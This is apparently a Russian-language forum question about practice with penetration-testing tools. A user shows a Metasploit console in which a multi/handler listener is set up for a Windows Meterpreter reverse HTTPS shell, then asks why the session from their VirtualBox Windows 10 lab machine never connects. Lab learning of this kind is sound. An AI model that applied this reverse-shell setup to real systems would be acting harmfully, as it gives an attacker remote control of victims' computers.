root@kali:~# msfconsole
/usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated
__________________________________________________ ____________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V4 |
|_________________________________________________ _____________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################## ##############################
################################################## ##############################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################## ##############################
https://metasploit.com
=[ metasploit v4.16.45-dev ]
+ -- --=[ 1744 exploits - 1000 auxiliary - 302 post ]
+ -- --=[ 529 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial:
http://r-7.co/trymsp ]
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > exploit
[*] Started HTTPS reverse handler on
https://10.0.2.15:8080
Отсутствует нижняя команда. Создал 2 машины (Кали, Виндоус10 -64) на Virtual box, настроил NatNetwork. Хотел для практики, локально настроиться на сеть - не выходит. Был бы рад за любую помощь, спасибо.
[*] Starting the payload handler...